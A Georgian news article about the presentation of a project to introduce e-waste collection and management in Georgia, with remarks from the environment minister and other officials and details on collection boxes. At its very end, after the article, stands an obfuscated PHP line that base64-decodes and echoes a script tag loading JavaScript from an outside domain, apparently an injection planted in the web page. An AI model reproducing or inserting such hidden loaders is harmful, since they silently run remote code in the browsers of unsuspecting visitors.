celsiusi
ავერსი საქკაბელი

გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ოთარ შამუგიამ პროექტის „ელექტრონარჩენების შეგროვების და მართვის სისტემის დანერგვა საქართველოში“ საპრეზენტაციო ღონისძიება გახსნა. პროექტის ფარგლებში, პირველად მოხდება ელექტრონარჩენების შეგროვების სისტემის დანერგვა.

პროექტი ითვალისწინებს ცნობიერების ამაღლების კამპანიის განხორციელებასაც. ოთარ შამუგიამ მისასალმებელ სიტყვაში ხაზი გაუსვა ნარჩენების მართვის თანამედროვე სისტემის შექმნის მნიშვნელობას და აღნიშნა, რომ მისი დანერგვა სახელმწიფოს პრიორიტეტული მიმართულებაა, რასაც ევროკავშირის ასოცირების ხელშეკრულებაც ითვალისწინებს.
 
„უკვე წლებია, ვახორციელებთ მნიშვნელოვან რეფორმებს გარემოსდაცვითი კუთხით და ეს შეეხება არაერთ მიმართულებას: სატყეო სექტორი, დაცული ტერიტორიები, ატმოსფერული ჰაერის ხარისხი, წყლის რესურსების მართვა და ასე შემდეგ. ჩვენი გარემოსდაცვითი პოლიტიკა და ეს რეფორმები სრულად ეხმიანება ასოცირების ხელშეკრულებით აღებულ ვალდებულებებს და იმ ნაბიჯებს, რომელსაც ჩვენ ვდგამთ ევროინტეგრაციის გზაზე. ნარჩენების მართვა გარემოს დაცვის პოლიტიკის ერთ-ერთი შემადგენელი ნაწილია. ჩვენ მუდმივ კომუნიკაციაში ვართ სექტორთან, რომ რეფორმა, რომელიც დავიწყეთ წარმოების გაფართოებული ვალდებულების ნაწილში, იყოს წარმატებული. უკვე ფუნქციონირებს სამი ორგანიზაცია და რეესტრში რეგისტრირებულია 11 ათასზე მეტი პირი. ნარჩენების მართვა ეკონომიკის ერთ-ერთი შემადგენელი ნაწილია და, შესაბამისად, მნიშვნელოვანია ამ პროცესში ბიზნესსექტორის და სახელმწიფო უწყებების თანამშრომლობა“, - განაცხადა ოთარ შამუგიამ.
 
მონაწილეებს სიტყვით მიმართეს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილე სოლომონ პავლიაშვილმა, პარლამენტის გარემოს დაცვისა და ბუნებრივი რესურსების კომიტეტის თავმჯდომარემ მაია ბითაძემ, ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილემ რომეო მიქაუტაძემ და USAID-ის ეკონომიკური ზრდის ოფისის ხელმძღვანელმა მიშელ კოშიელსკიმ. ღონისძიებას ადგილობრივი მუნიციპალიტეტის,
ბიზნესასოციაციისა და კერძო სექტორის წარმომადგენლები ესწრებოდნენ. პრეზენტაციის ფარგლებში, პანელური დისკუსიები გაიმართა ელექტრონარჩენების შეგროვებისა და მართვის სისტემის დანერგვაზე,
ბიზნესსექტორის ჩართულობის მნიშვნელობაზე, ელექტრონარჩენების რეციკლირებასა და ცირკულარულ ეკონომიკაზე. ღონისძიება საქართველოს მწარმოებლის გაფართოებული ვალდებულების ასოციაციის „Wasteless“ ორგანიზებით გაიმართა. „Wasteless“ არის სპეციფიკური ნარჩენების მართვის ასოციაცია, რომელშიც 10500 კომპანიაა გაერთიანებული. ორგანიზაცია ელექტრომოწყობილობების, ბატარეების და აკუმულატორების, ზეთებისა და საბურავების ნარჩენების შეგროვებას და მართვის შემდგომ ციკლს უზრუნველყოფს. ღონისძიების ფარგლებში მოეწყო ელექტრონარჩენებისგან დამზადებული ხელნაკეთი ნივთების გამოფენა; საჩვენებლად გამოიფინა ყუთები, სადაც ძველი და დაზიანებული ელექტრონარჩენების განთავსებაა შესაძლებელი. აღსანიშნავია, რომ ელექტრონარჩენების შესაგროვებელი 10 დიდი და 178 პატარა ყუთი, უახლოეს დღეებში, სავაჭრო ცენტრებსა და საზოგადოების თავშეყრის ადგილებზე დაიდგმება.

259
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");